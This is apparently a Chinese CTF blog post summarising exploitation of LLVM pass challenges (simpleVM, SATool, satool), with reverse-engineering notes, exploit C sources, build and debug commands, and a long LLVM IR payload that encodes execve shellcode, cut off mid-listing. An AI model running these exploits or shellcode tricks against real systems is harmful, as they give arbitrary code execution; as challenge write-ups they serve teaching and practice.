CTF导航 CTF导航

llvm pass总结

渗透技巧 1年前 (2023) admin
167 0 0

安装环境的话主要是这2个

sudo apt install llvmsudo apt install clang# 在输入完sudo apt install llvm-时按下tab键查看有哪些版本可以获取

llvmpass利用基本上如图所示

通过opt利用so文件对IR(exp.ll)进行优化的过程

llvm pass总结

详细原理不再赘述,文后会有几篇文章

接下来主要是分享几道例题

Part01.

simpleVM(改got表为one)

llvm pass总结

题目来自2021红帽杯初赛

llvm pass总结

把VMPass.so放入IDA

找到runOnFunction

会检验函数名,为o0o0o0o0即可继续执行

llvm pass总结

接下来用while循环

遍历o0o0o0o0函数的每一个basicblock

每个basicblock作为参数进函数vuln

llvm pass总结

然后又是while循环

遍历每一个basicblock

匹配指令名,分别进行不同的处理。

llvm pass总结

这道题主要利用点在每次比对结束都会执行一次free,而opt-8没开pie且got表可写,结合上边的赋值,可以考虑修改free_got为one_gadget。add功能可以REG1/2+任意值;load功能相当于store的逆向,可以把got表里的真实地址赋值给REG1/2

llvm pass总结
//libc 2.27-3ubuntu1.5void store(int a);void load(int a);void add(int a, int b);
void o0o0o0o0(){    add(1, 0x77e100);    load(1);    add(2, 0x729ec);    store(1);}
from pwn import *
p = process("./opt-8")elf = ELF("./opt-8")libc = ELF("./libc-2.27.so")
print hex(elf.got['free'])print hex(libc.sym['free'])

进行编译

clang -emit-llvm -S exp.c -o exp.ll

进行优化

./opt-8 -load ./VMPass.so -VMPass ./exp.ll
llvm pass总结

这里说一下环境的问题,这里需要配置opt的libc环境到对应版本,建议的话,到对应版本的虚拟机去打,不同的版本你装的llvm版本可能不同,这道题我在ubuntu18下完成利用。

llvm pass总结
patchelf --set-rpath /home/ef4tless/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ opt-8

Part02.

SATool(堆mainarena改one)

llvm pass总结

题目来自ciscn2021年的国赛

llvm pass总结

先看函数叫啥名

llvm pass总结

同样的进runonfunction

这里对函数名的校验,这里是16进制比对

所以值为B4ckDo0r

llvm pass总结

先看save函数,中间有很多报错函数

llvm pass总结

从上往下看的话,这部分开始应该就是函数核心功能,malloc_0x18赋给ptr,这里的src和v84结合上边的函数推测应该是我们输入的第一个和第二个参数,往堆fd和bk位分别写入东西,然后是对写入内容的校验。

llvm pass总结

然后是takeaway,它主要判断了一个ptr是否存在然后if判断结束执行了一个free,v45 = v54 = ptr[2];

llvm pass总结

stealkey是把堆里的内容覆给一个变量

llvm pass总结

fakekey则是把变量里的值加一个输入数

赋值给ptr,相当于add

llvm pass总结

run执行ptr的内容

llvm pass总结

涉及到堆,需要进行一个调试

根据上边的分析写一个exp框架

#include <stdio.h>int run(){return 0;};int save(char *a1,char *a2){return 0;};int fakekey(int64){return 0;};int takeaway(char *a1){return 0;};int B4ckDo0r(){    save("aaaa","aaaa");}
clang -emit-llvm -S exp.c -o exp.llgdb optb llvm::Pass::preparePassManagerrun -load ./SAPass.so -SAPass ./exp.ll > /dev/null然后在SAPass.so上下断点

我们断点打在save赋值完成后

也可以通过这种方式验证我们对程序的分析是否准确

llvm pass总结

这道题tcache里还有6个堆,我们再用save申请掉剩下的,再申请就会切割unsortbin,fd和bk就会被写上mainarena,再利用add功能,加上偏移为gadget,然后利用执行功能就能getshell了

llvm pass总结
//GLIBC 2.27-3ubuntu1.5#include <stdio.h>int run(){return 0;};int save(char *a1,char *a2){return 0;};int fakekey(int64){return 0;};int takeaway(char *a1){return 0;};int stealkey(){return 0;};int B4ckDo0r(){    save("e4l4","e4l4");    save("e4l4","e4l4");    save("e4l4","e4l4");    save("e4l4","e4l4");    save("e4l4","e4l4");    save("e4l4","e4l4");    save("e4l4","e4l4");    save("x00","e4l4");    stealkey();    fakekey(-0x2E19b4);    run();}
llvm pass总结

Part03.

satool(直接写exp.ll)

llvm pass总结

题目来自ciscn2022初赛

llvm pass总结

题目没有给opt,但是readme.txt提到了用opt-12

给到了一个优化示例

llvm pass总结

应该是想告诉我们这个优化的作用,似乎是对加法的一种优化。然后就IDA找runonfunction,对参数的一些判断

llvm pass总结

这题的核心主要是这个部分

3是可读可写,5是可读可执行

llvm pass总结

handle函数对参数进行了一些操作,this4为头指针,end为尾指针,this5为当前指针。这里还保留了一些函数名,主要执行writeMovImm64和writeRet

llvm pass总结

writeMovImm64就是往this+5写东西

内容为[参数+bb48],然后(this+5)+A

llvm pass总结

48bb1122334455667788是movabs rbx, 

0x8877665544332211的字节码

llvm pass总结

+10正好是movabs rbx,

0x8877665544332211 的长度


writeRet也是往this+5写东西c3就是ret

llvm pass总结

综上,这里就是一个合成shellcode片段的地方,合成一条条的movabs


然后执行的callcode部分,直接执行this4的位置(即movabs指令)

llvm pass总结

漏洞点在于边界

handle对参数处理的范围只到+0xff0

这里存在一个shellcode的偏差

比如这样一段shellcode

llvm pass总结

如果我们+2(0x7ffff7ffb018)此时我们输入的参数就会成为一段汇编

llvm pass总结
llvm pass总结

也就是说我们能在参数位置布置shellcode

比如jmp 7(“xebx05”)


这里怎样才能制造这种偏差呢?

就利用它超出边界的部分会被保留

边界内会被覆盖新的shellcode来实现切割shellcode


第一步:我们在将最后一组movabs的起始点放在+0xfee处这样+0xff0就是我们布置的shellcode(9090ebb2==nopnopjmp)

llvm pass总结
llvm pass总结

第二步:再起一个函数块,这次我们读入内容填充至+0xff2,这样就能正常执行到jmp指令。同样jmp以后我们还要利用这样+2的方式在jmp目标地址伪造好shellcode,由于我们一组读入的参数有限(6个字节)就需要多次jmp来执行syscall(59)

llvm pass总结

shellcode如下

llvm pass总结

这里还有个点就是短jmp(E8)的机器码

直接用网站生成即可jmp -76


jmp 0x7ffff7ffbfa6 是用的

ebb2 == jmp 0xffffffffffffffb4(负跳转) 

即-76

llvm pass总结

exp做了一些批注,利用时删除批注

define dso_local i64 @foo(i64 %0) local_unnamed_addr #0 {  %2 = add nsw i64 %0, 3001782416   %3 = add nsw i64 %2, 20000000000000  %4 = add nsw i64 %3, 20000000000000  %5 = add nsw i64 %4, 20000000000000  %6 = add nsw i64 %5, 20000000000000  %7 = add nsw i64 %6, 20000000000000  %8 = add nsw i64 %7, 20000000000000  %9 = add nsw i64 %8, 20000000000000  %10 = add nsw i64 %9, 20000000000000  %11 = add nsw i64 %10, 20000000000000  %12 = add nsw i64 %11, 20000000000000  %13 = add nsw i64 %12, 20000000000000  %14 = add nsw i64 %13, 20000000000000  %15 = add nsw i64 %14, 20000000000000  %16 = add nsw i64 %15, 20000000000000  %17 = add nsw i64 %16, 20000000000000  %18 = add nsw i64 %17, 20000000000000  %19 = add nsw i64 %18, 20000000000000  %20 = add nsw i64 %19, 20000000000000  %21 = add nsw i64 %20, 20000000000000  %22 = add nsw i64 %21, 20000000000000  %23 = add nsw i64 %22, 20000000000000  %24 = add nsw i64 %23, 20000000000000  %25 = add nsw i64 %24, 20000000000000  %26 = add nsw i64 %25, 20000000000000  %27 = add nsw i64 %26, 20000000000000  %28 = add nsw i64 %27, 20000000000000  %29 = add nsw i64 %28, 20000000000000  %30 = add nsw i64 %29, 20000000000000  %31 = add nsw i64 %30, 20000000000000  %32 = add nsw i64 %31, 20000000000000  %33 = add nsw i64 %32, 20000000000000  %34 = add nsw i64 %33, 20000000000000  %35 = add nsw i64 %34, 20000000000000  %36 = add nsw i64 %35, 20000000000000  %37 = add nsw i64 %36, 20000000000000  %38 = add nsw i64 %37, 20000000000000  %39 = add nsw i64 %38, 20000000000000  %40 = add nsw i64 %39, 20000000000000  %41 = add nsw i64 %40, 20000000000000  %42 = add nsw i64 %41, 20000000000000  %43 = add nsw i64 %42, 20000000000000  %44 = add nsw i64 %43, 20000000000000  %45 = add nsw i64 %44, 20000000000000  %46 = add nsw i64 %45, 20000000000000  %47 = add nsw i64 %46, 20000000000000  %48 = add nsw i64 %47, 20000000000000  %49 = add nsw i64 %48, 20000000000000  %50 = add nsw i64 %49, 20000000000000  %51 = add nsw i64 %50, 20000000000000  %52 = add nsw i64 %51, 20000000000000  %53 = add nsw i64 %52, 20000000000000  %54 = add nsw i64 %53, 20000000000000  %55 = add nsw i64 %54, 20000000000000  %56 = add nsw i64 %55, 20000000000000  %57 = add nsw i64 %56, 20000000000000  %58 = add nsw i64 %57, 20000000000000  %59 = add nsw i64 %58, 20000000000000  %60 = add nsw i64 %59, 20000000000000  %61 = add nsw i64 %60, 20000000000000  %62 = add nsw i64 %61, 20000000000000  %63 = add nsw i64 %62, 20000000000000  %64 = add nsw i64 %63, 20000000000000  %65 = add nsw i64 %64, 20000000000000  %66 = add nsw i64 %65, 20000000000000  %67 = add nsw i64 %66, 20000000000000  %68 = add nsw i64 %67, 20000000000000  %69 = add nsw i64 %68, 20000000000000  %70 = add nsw i64 %69, 20000000000000  %71 = add nsw i64 %70, 20000000000000  %72 = add nsw i64 %71, 20000000000000  %73 = add nsw i64 %72, 20000000000000  %74 = add nsw i64 %73, 20000000000000  %75 = add nsw i64 %74, 20000000000000  %76 = add nsw i64 %75, 20000000000000  %77 = add nsw i64 %76, 20000000000000  %78 = add nsw i64 %77, 20000000000000  %79 = add nsw i64 %78, 20000000000000  %80 = add nsw i64 %79, 20000000000000  %81 = add nsw i64 %80, 20000000000000  %82 = add nsw i64 %81, 20000000000000  %83 = add nsw i64 %82, 20000000000000  %84 = add nsw i64 %83, 20000000000000  %85 = add nsw i64 %84, 20000000000000  %86 = add nsw i64 %85, 20000000000000  %87 = add nsw i64 %86, 20000000000000  %88 = add nsw i64 %87, 20000000000000  %89 = add nsw i64 %88, 20000000000000  %90 = add nsw i64 %89, 20000000000000  %91 = add nsw i64 %90, 20000000000000  %92 = add nsw i64 %91, 20000000000000  %93 = add nsw i64 %92, 20000000000000  %94 = add nsw i64 %93, 20000000000000  %95 = add nsw i64 %94, 20000000000000  %96 = add nsw i64 %95, 20000000000000  %97 = add nsw i64 %96, 20000000000000  %98 = add nsw i64 %97, 20000000000000  %99 = add nsw i64 %98, 20000000000000  %100 = add nsw i64 %99, 20000000000000  %101 = add nsw i64 %100, 20000000000000  %102 = add nsw i64 %101, 20000000000000  %103 = add nsw i64 %102, 20000000000000  %104 = add nsw i64 %103, 20000000000000  %105 = add nsw i64 %104, 20000000000000  %106 = add nsw i64 %105, 20000000000000  %107 = add nsw i64 %106, 20000000000000  %108 = add nsw i64 %107, 20000000000000  %109 = add nsw i64 %108, 20000000000000  %110 = add nsw i64 %109, 20000000000000  %111 = add nsw i64 %110, 20000000000000  %112 = add nsw i64 %111, 20000000000000  %113 = add nsw i64 %112, 20000000000000  %114 = add nsw i64 %113, 20000000000000  %115 = add nsw i64 %114, 20000000000000  %116 = add nsw i64 %115, 20000000000000  %117 = add nsw i64 %116, 20000000000000  %118 = add nsw i64 %117, 20000000000000  %119 = add nsw i64 %118, 20000000000000  %120 = add nsw i64 %119, 20000000000000  %121 = add nsw i64 %120, 20000000000000  %122 = add nsw i64 %121, 20000000000000  %123 = add nsw i64 %122, 20000000000000  %124 = add nsw i64 %123, 20000000000000  %125 = add nsw i64 %124, 20000000000000  %126 = add nsw i64 %125, 20000000000000  %127 = add nsw i64 %126, 20000000000000  %128 = add nsw i64 %127, 20000000000000  %129 = add nsw i64 %128, 20000000000000  %130 = add nsw i64 %129, 20000000000000  %131 = add nsw i64 %130, 20000000000000  %132 = add nsw i64 %131, 20000000000000  %133 = add nsw i64 %132, 20000000000000  %134 = add nsw i64 %133, 20000000000000  %135 = add nsw i64 %134, 20000000000000  %136 = add nsw i64 %135, 20000000000000  %137 = add nsw i64 %136, 20000000000000  %138 = add nsw i64 %137, 20000000000000  %139 = add nsw i64 %138, 20000000000000  %140 = add nsw i64 %139, 20000000000000  %141 = add nsw i64 %140, 20000000000000  %142 = add nsw i64 %141, 20000000000000  %143 = add nsw i64 %142, 20000000000000  %144 = add nsw i64 %143, 20000000000000  %145 = add nsw i64 %144, 20000000000000  %146 = add nsw i64 %145, 20000000000000  %147 = add nsw i64 %146, 20000000000000  %148 = add nsw i64 %147, 20000000000000  %149 = add nsw i64 %148, 20000000000000  %150 = add nsw i64 %149, 20000000000000  %151 = add nsw i64 %150, 20000000000000  %152 = add nsw i64 %151, 20000000000000  %153 = add nsw i64 %152, 20000000000000  %154 = add nsw i64 %153, 20000000000000  %155 = add nsw i64 %154, 20000000000000  %156 = add nsw i64 %155, 20000000000000  %157 = add nsw i64 %156, 20000000000000  %158 = add nsw i64 %157, 20000000000000  %159 = add nsw i64 %158, 20000000000000  %160 = add nsw i64 %159, 20000000000000  %161 = add nsw i64 %160, 20000000000000  %162 = add nsw i64 %161, 20000000000000  %163 = add nsw i64 %162, 20000000000000  %164 = add nsw i64 %163, 20000000000000  %165 = add nsw i64 %164, 20000000000000  %166 = add nsw i64 %165, 20000000000000  %167 = add nsw i64 %166, 20000000000000  %168 = add nsw i64 %167, 20000000000000  %169 = add nsw i64 %168, 20000000000000  %170 = add nsw i64 %169, 20000000000000  %171 = add nsw i64 %170, 20000000000000  %172 = add nsw i64 %171, 20000000000000  %173 = add nsw i64 %172, 20000000000000  %174 = add nsw i64 %173, 20000000000000  %175 = add nsw i64 %174, 20000000000000  %176 = add nsw i64 %175, 20000000000000  %177 = add nsw i64 %176, 20000000000000  %178 = add nsw i64 %177, 20000000000000  %179 = add nsw i64 %178, 20000000000000  %180 = add nsw i64 %179, 20000000000000  %181 = add nsw i64 %180, 20000000000000  %182 = add nsw i64 %181, 20000000000000  %183 = add nsw i64 %182, 20000000000000  %184 = add nsw i64 %183, 20000000000000  %185 = add nsw i64 %184, 20000000000000  %186 = add nsw i64 %185, 20000000000000  %187 = add nsw i64 %186, 20000000000000  %188 = add nsw i64 %187, 20000000000000  %189 = add nsw i64 %188, 20000000000000  %190 = add nsw i64 %189, 20000000000000  %191 = add nsw i64 %190, 20000000000000  %192 = add nsw i64 %191, 20000000000000  %193 = add nsw i64 %192, 20000000000000  %194 = add nsw i64 %193, 20000000000000  %195 = add nsw i64 %194, 20000000000000  %196 = add nsw i64 %195, 20000000000000  %197 = add nsw i64 %196, 20000000000000  %198 = add nsw i64 %197, 20000000000000  %199 = add nsw i64 %198, 20000000000000  %200 = add nsw i64 %199, 20000000000000  %201 = add nsw i64 %200, 20000000000000  %202 = add nsw i64 %201, 20000000000000  %203 = add nsw i64 %202, 20000000000000  %204 = add nsw i64 %203, 20000000000000  %205 = add nsw i64 %204, 20000000000000  %206 = add nsw i64 %205, 20000000000000  %207 = add nsw i64 %206, 20000000000000  %208 = add nsw i64 %207, 20000000000000  %209 = add nsw i64 %208, 20000000000000  %210 = add nsw i64 %209, 20000000000000  %211 = add nsw i64 %210, 20000000000000  %212 = add nsw i64 %211, 20000000000000  %213 = add nsw i64 %212, 20000000000000  %214 = add nsw i64 %213, 20000000000000  %215 = add nsw i64 %214, 20000000000000  %216 = add nsw i64 %215, 20000000000000  %217 = add nsw i64 %216, 20000000000000  %218 = add nsw i64 %217, 20000000000000  %219 = add nsw i64 %218, 20000000000000  %220 = add nsw i64 %219, 20000000000000  %221 = add nsw i64 %220, 20000000000000  %222 = add nsw i64 %221, 20000000000000  %223 = add nsw i64 %222, 20000000000000  %224 = add nsw i64 %223, 20000000000000  %225 = add nsw i64 %224, 20000000000000  %226 = add nsw i64 %225, 20000000000000  %227 = add nsw i64 %226, 20000000000000  %228 = add nsw i64 %227, 20000000000000  %229 = add nsw i64 %228, 20000000000000  %230 = add nsw i64 %229, 20000000000000  %231 = add nsw i64 %230, 20000000000000  %232 = add nsw i64 %231, 20000000000000  %233 = add nsw i64 %232, 20000000000000  %234 = add nsw i64 %233, 20000000000000  %235 = add nsw i64 %234, 20000000000000  %236 = add nsw i64 %235, 20000000000000  %237 = add nsw i64 %236, 20000000000000  %238 = add nsw i64 %237, 20000000000000  %239 = add nsw i64 %238, 20000000000000  %240 = add nsw i64 %239, 20000000000000  %241 = add nsw i64 %240, 20000000000000  %242 = add nsw i64 %241, 20000000000000  %243 = add nsw i64 %242, 20000000000000  %244 = add nsw i64 %243, 20000000000000  %245 = add nsw i64 %244, 20000000000000  %246 = add nsw i64 %245, 20000000000000  %247 = add nsw i64 %246, 20000000000000  %248 = add nsw i64 %247, 20000000000000  %249 = add nsw i64 %248, 20000000000000  %250 = add nsw i64 %249, 20000000000000  %251 = add nsw i64 %250, 20000000000000  %252 = add nsw i64 %251, 20000000000000  %253 = add nsw i64 %252, 20000000000000  %254 = add nsw i64 %253, 20000000000000  %255 = add nsw i64 %254, 20000000000000  %256 = add nsw i64 %255, 20000000000000  %257 = add nsw i64 %256, 20000000000000  %258 = add nsw i64 %257, 20000000000000  %259 = add nsw i64 %258, 20000000000000  %260 = add nsw i64 %259, 20000000000000  %261 = add nsw i64 %260, 20000000000000  %262 = add nsw i64 %261, 20000000000000  %263 = add nsw i64 %262, 20000000000000  %264 = add nsw i64 %263, 20000000000000  %265 = add nsw i64 %264, 20000000000000  %266 = add nsw i64 %265, 20000000000000  %267 = add nsw i64 %266, 20000000000000  %268 = add nsw i64 %267, 20000000000000  %269 = add nsw i64 %268, 20000000000000  %270 = add nsw i64 %269, 20000000000000  %271 = add nsw i64 %270, 20000000000000  %272 = add nsw i64 %271, 20000000000000  %273 = add nsw i64 %272, 20000000000000  %274 = add nsw i64 %273, 20000000000000  %275 = add nsw i64 %274, 20000000000000  %276 = add nsw i64 %275, 20000000000000  %277 = add nsw i64 %276, 20000000000000  %278 = add nsw i64 %277, 20000000000000  %279 = add nsw i64 %278, 20000000000000  %280 = add nsw i64 %279, 20000000000000  %281 = add nsw i64 %280, 20000000000000  %282 = add nsw i64 %281, 20000000000000  %283 = add nsw i64 %282, 20000000000000  %284 = add nsw i64 %283, 20000000000000  %285 = add nsw i64 %284, 20000000000000  %286 = add nsw i64 %285, 20000000000000  %287 = add nsw i64 %286, 20000000000000  %288 = add nsw i64 %287, 20000000000000  %289 = add nsw i64 %288, 20000000000000  %290 = add nsw i64 %289, 20000000000000  %291 = add nsw i64 %290, 20000000000000  %292 = add nsw i64 %291, 20000000000000  %293 = add nsw i64 %292, 20000000000000  %294 = add nsw i64 %293, 20000000000000  %295 = add nsw i64 %294, 20000000000000  %296 = add nsw i64 %295, 20000000000000  %297 = add nsw i64 %296, 20000000000000  %298 = add nsw i64 %297, 20000000000000  %299 = add nsw i64 %298, 20000000000000  %300 = add nsw i64 %299, 20000000000000  %301 = add nsw i64 %300, 20000000000000  %302 = add nsw i64 %301, 20000000000000  %303 = add nsw i64 %302, 20000000000000  %304 = add nsw i64 %303, 20000000000000  %305 = add nsw i64 %304, 20000000000000  %306 = add nsw i64 %305, 20000000000000  %307 = add nsw i64 %306, 20000000000000  %308 = add nsw i64 %307, 20000000000000  %309 = add nsw i64 %308, 20000000000000  %310 = add nsw i64 %309, 20000000000000  %311 = add nsw i64 %310, 20000000000000  %312 = add nsw i64 %311, 20000000000000  %313 = add nsw i64 %312, 20000000000000  %314 = add nsw i64 %313, 20000000000000  %315 = add nsw i64 %314, 1  %316 = add nsw i64 %315, 1  %317 = add nsw i64 %316, 1  %318 = add nsw i64 %317, 1 //inc rax 3字节  ret i64 %318}
define dso_local i64 @foo1(i64 %0) local_unnamed_addr #0 {  %2 = add nsw i64 %0, 21732277098 // 0x50f583b6a  %3 = add nsw i64 %2, 426533919260756112 // 0x5eb5a56f6314890  %4 = add nsw i64 %3, 426712264860536976 // 0x5ebfc8b48509090  %5 = add nsw i64 %4, 426555988614513992 // 0x5eb6e69622f0548  %6 = add nsw i64 %5, 426470739404150928 // 0x5EB20E0C1485890  %7 = add nsw i64 %6, 426435038325729424 // 0x6eb0068732f6890  %8 = add nsw i64 %7, 20000000000000  %9 = add nsw i64 %8, 20000000000000  %10 = add nsw i64 %9, 20000000000000  %11 = add nsw i64 %10, 20000000000000  %12 = add nsw i64 %11, 20000000000000  %13 = add nsw i64 %12, 20000000000000  %14 = add nsw i64 %13, 20000000000000  %15 = add nsw i64 %14, 20000000000000  %16 = add nsw i64 %15, 20000000000000  %17 = add nsw i64 %16, 20000000000000  %18 = add nsw i64 %17, 20000000000000  %19 = add nsw i64 %18, 20000000000000  %20 = add nsw i64 %19, 20000000000000  %21 = add nsw i64 %20, 20000000000000  %22 = add nsw i64 %21, 20000000000000  %23 = add nsw i64 %22, 20000000000000  %24 = add nsw i64 %23, 20000000000000  %25 = add nsw i64 %24, 20000000000000  %26 = add nsw i64 %25, 20000000000000  %27 = add nsw i64 %26, 20000000000000  %28 = add nsw i64 %27, 20000000000000  %29 = add nsw i64 %28, 20000000000000  %30 = add nsw i64 %29, 20000000000000  %31 = add nsw i64 %30, 20000000000000  %32 = add nsw i64 %31, 20000000000000  %33 = add nsw i64 %32, 20000000000000  %34 = add nsw i64 %33, 20000000000000  %35 = add nsw i64 %34, 20000000000000  %36 = add nsw i64 %35, 20000000000000  %37 = add nsw i64 %36, 20000000000000  %38 = add nsw i64 %37, 20000000000000  %39 = add nsw i64 %38, 20000000000000  %40 = add nsw i64 %39, 20000000000000  %41 = add nsw i64 %40, 20000000000000  %42 = add nsw i64 %41, 20000000000000  %43 = add nsw i64 %42, 20000000000000  %44 = add nsw i64 %43, 20000000000000  %45 = add nsw i64 %44, 20000000000000  %46 = add nsw i64 %45, 20000000000000  %47 = add nsw i64 %46, 20000000000000  %48 = add nsw i64 %47, 20000000000000  %49 = add nsw i64 %48, 20000000000000  %50 = add nsw i64 %49, 20000000000000  %51 = add nsw i64 %50, 20000000000000  %52 = add nsw i64 %51, 20000000000000  %53 = add nsw i64 %52, 20000000000000  %54 = add nsw i64 %53, 20000000000000  %55 = add nsw i64 %54, 20000000000000  %56 = add nsw i64 %55, 20000000000000  %57 = add nsw i64 %56, 20000000000000  %58 = add nsw i64 %57, 20000000000000  %59 = add nsw i64 %58, 20000000000000  %60 = add nsw i64 %59, 20000000000000  %61 = add nsw i64 %60, 20000000000000  %62 = add nsw i64 %61, 20000000000000  %63 = add nsw i64 %62, 20000000000000  %64 = add nsw i64 %63, 20000000000000  %65 = add nsw i64 %64, 20000000000000  %66 = add nsw i64 %65, 20000000000000  %67 = add nsw i64 %66, 20000000000000  %68 = add nsw i64 %67, 20000000000000  %69 = add nsw i64 %68, 20000000000000  %70 = add nsw i64 %69, 20000000000000  %71 = add nsw i64 %70, 20000000000000  %72 = add nsw i64 %71, 20000000000000  %73 = add nsw i64 %72, 20000000000000  %74 = add nsw i64 %73, 20000000000000  %75 = add nsw i64 %74, 20000000000000  %76 = add nsw i64 %75, 20000000000000  %77 = add nsw i64 %76, 20000000000000  %78 = add nsw i64 %77, 20000000000000  %79 = add nsw i64 %78, 20000000000000  %80 = add nsw i64 %79, 20000000000000  %81 = add nsw i64 %80, 20000000000000  %82 = add nsw i64 %81, 20000000000000  %83 = add nsw i64 %82, 20000000000000  %84 = add nsw i64 %83, 20000000000000  %85 = add nsw i64 %84, 20000000000000  %86 = add nsw i64 %85, 20000000000000  %87 = add nsw i64 %86, 20000000000000  %88 = add nsw i64 %87, 20000000000000  %89 = add nsw i64 %88, 20000000000000  %90 = add nsw i64 %89, 20000000000000  %91 = add nsw i64 %90, 20000000000000  %92 = add nsw i64 %91, 20000000000000  %93 = add nsw i64 %92, 20000000000000  %94 = add nsw i64 %93, 20000000000000  %95 = add nsw i64 %94, 20000000000000  %96 = add nsw i64 %95, 20000000000000  %97 = add nsw i64 %96, 20000000000000  %98 = add nsw i64 %97, 20000000000000  %99 = add nsw i64 %98, 20000000000000  %100 = add nsw i64 %99, 20000000000000  %101 = add nsw i64 %100, 20000000000000  %102 = add nsw i64 %101, 20000000000000  %103 = add nsw i64 %102, 20000000000000  %104 = add nsw i64 %103, 20000000000000  %105 = add nsw i64 %104, 20000000000000  %106 = add nsw i64 %105, 20000000000000  %107 = add nsw i64 %106, 20000000000000  %108 = add nsw i64 %107, 20000000000000  %109 = add nsw i64 %108, 20000000000000  %110 = add nsw i64 %109, 20000000000000  %111 = add nsw i64 %110, 20000000000000  %112 = add nsw i64 %111, 20000000000000  %113 = add nsw i64 %112, 20000000000000  %114 = add nsw i64 %113, 20000000000000  %115 = add nsw i64 %114, 20000000000000  %116 = add nsw i64 %115, 20000000000000  %117 = add nsw i64 %116, 20000000000000  %118 = add nsw i64 %117, 20000000000000  %119 = add nsw i64 %118, 20000000000000  %120 = add nsw i64 %119, 20000000000000  %121 = add nsw i64 %120, 20000000000000  %122 = add nsw i64 %121, 20000000000000  %123 = add nsw i64 %122, 20000000000000  %124 = add nsw i64 %123, 20000000000000  %125 = add nsw i64 %124, 20000000000000  %126 = add nsw i64 %125, 20000000000000  %127 = add nsw i64 %126, 20000000000000  %128 = add nsw i64 %127, 20000000000000  %129 = add nsw i64 %128, 20000000000000  %130 = add nsw i64 %129, 20000000000000  %131 = add nsw i64 %130, 20000000000000  %132 = add nsw i64 %131, 20000000000000  %133 = add nsw i64 %132, 20000000000000  %134 = add nsw i64 %133, 20000000000000  %135 = add nsw i64 %134, 20000000000000  %136 = add nsw i64 %135, 20000000000000  %137 = add nsw i64 %136, 20000000000000  %138 = add nsw i64 %137, 20000000000000  %139 = add nsw i64 %138, 20000000000000  %140 = add nsw i64 %139, 20000000000000  %141 = add nsw i64 %140, 20000000000000  %142 = add nsw i64 %141, 20000000000000  %143 = add nsw i64 %142, 20000000000000  %144 = add nsw i64 %143, 20000000000000  %145 = add nsw i64 %144, 20000000000000  %146 = add nsw i64 %145, 20000000000000  %147 = add nsw i64 %146, 20000000000000  %148 = add nsw i64 %147, 20000000000000  %149 = add nsw i64 %148, 20000000000000  %150 = add nsw i64 %149, 20000000000000  %151 = add nsw i64 %150, 20000000000000  %152 = add nsw i64 %151, 20000000000000  %153 = add nsw i64 %152, 20000000000000  %154 = add nsw i64 %153, 20000000000000  %155 = add nsw i64 %154, 20000000000000  %156 = add nsw i64 %155, 20000000000000  %157 = add nsw i64 %156, 20000000000000  %158 = add nsw i64 %157, 20000000000000  %159 = add nsw i64 %158, 20000000000000  %160 = add nsw i64 %159, 20000000000000  %161 = add nsw i64 %160, 20000000000000  %162 = add nsw i64 %161, 20000000000000  %163 = add nsw i64 %162, 20000000000000  %164 = add nsw i64 %163, 20000000000000  %165 = add nsw i64 %164, 20000000000000  %166 = add nsw i64 %165, 20000000000000  %167 = add nsw i64 %166, 20000000000000  %168 = add nsw i64 %167, 20000000000000  %169 = add nsw i64 %168, 20000000000000  %170 = add nsw i64 %169, 20000000000000  %171 = add nsw i64 %170, 20000000000000  %172 = add nsw i64 %171, 20000000000000  %173 = add nsw i64 %172, 20000000000000  %174 = add nsw i64 %173, 20000000000000  %175 = add nsw i64 %174, 20000000000000  %176 = add nsw i64 %175, 20000000000000  %177 = add nsw i64 %176, 20000000000000  %178 = add nsw i64 %177, 20000000000000  %179 = add nsw i64 %178, 20000000000000  %180 = add nsw i64 %179, 20000000000000  %181 = add nsw i64 %180, 20000000000000  %182 = add nsw i64 %181, 20000000000000  %183 = add nsw i64 %182, 20000000000000  %184 = add nsw i64 %183, 20000000000000  %185 = add nsw i64 %184, 20000000000000  %186 = add nsw i64 %185, 20000000000000  %187 = add nsw i64 %186, 20000000000000  %188 = add nsw i64 %187, 20000000000000  %189 = add nsw i64 %188, 20000000000000  %190 = add nsw i64 %189, 20000000000000  %191 = add nsw i64 %190, 20000000000000  %192 = add nsw i64 %191, 20000000000000  %193 = add nsw i64 %192, 20000000000000  %194 = add nsw i64 %193, 20000000000000  %195 = add nsw i64 %194, 20000000000000  %196 = add nsw i64 %195, 20000000000000  %197 = add nsw i64 %196, 20000000000000  %198 = add nsw i64 %197, 20000000000000  %199 = add nsw i64 %198, 20000000000000  %200 = add nsw i64 %199, 20000000000000  %201 = add nsw i64 %200, 20000000000000  %202 = add nsw i64 %201, 20000000000000  %203 = add nsw i64 %202, 20000000000000  %204 = add nsw i64 %203, 20000000000000  %205 = add nsw i64 %204, 20000000000000  %206 = add nsw i64 %205, 20000000000000  %207 = add nsw i64 %206, 20000000000000  %208 = add nsw i64 %207, 20000000000000  %209 = add nsw i64 %208, 20000000000000  %210 = add nsw i64 %209, 20000000000000  %211 = add nsw i64 %210, 20000000000000  %212 = add nsw i64 %211, 20000000000000  %213 = add nsw i64 %212, 20000000000000  %214 = add nsw i64 %213, 20000000000000  %215 = add nsw i64 %214, 20000000000000  %216 = add nsw i64 %215, 20000000000000  %217 = add nsw i64 %216, 20000000000000  %218 = add nsw i64 %217, 20000000000000  %219 = add nsw i64 %218, 20000000000000  %220 = add nsw i64 %219, 20000000000000  %221 = add nsw i64 %220, 20000000000000  %222 = add nsw i64 %221, 20000000000000  %223 = add nsw i64 %222, 20000000000000  %224 = add nsw i64 %223, 20000000000000  %225 = add nsw i64 %224, 20000000000000  %226 = add nsw i64 %225, 20000000000000  %227 = add nsw i64 %226, 20000000000000  %228 = add nsw i64 %227, 20000000000000  %229 = add nsw i64 %228, 20000000000000  %230 = add nsw i64 %229, 20000000000000  %231 = add nsw i64 %230, 20000000000000  %232 = add nsw i64 %231, 20000000000000  %233 = add nsw i64 %232, 20000000000000  %234 = add nsw i64 %233, 20000000000000  %235 = add nsw i64 %234, 20000000000000  %236 = add nsw i64 %235, 20000000000000  %237 = add nsw i64 %236, 20000000000000  %238 = add nsw i64 %237, 20000000000000  %239 = add nsw i64 %238, 20000000000000  %240 = add nsw i64 %239, 20000000000000  %241 = add nsw i64 %240, 20000000000000  %242 = add nsw i64 %241, 20000000000000  %243 = add nsw i64 %242, 20000000000000  %244 = add nsw i64 %243, 20000000000000  %245 = add nsw i64 %244, 20000000000000  %246 = add nsw i64 %245, 20000000000000  %247 = add nsw i64 %246, 20000000000000  %248 = add nsw i64 %247, 20000000000000  %249 = add nsw i64 %248, 20000000000000  %250 = add nsw i64 %249, 20000000000000  %251 = add nsw i64 %250, 20000000000000  %252 = add nsw i64 %251, 20000000000000  %253 = add nsw i64 %252, 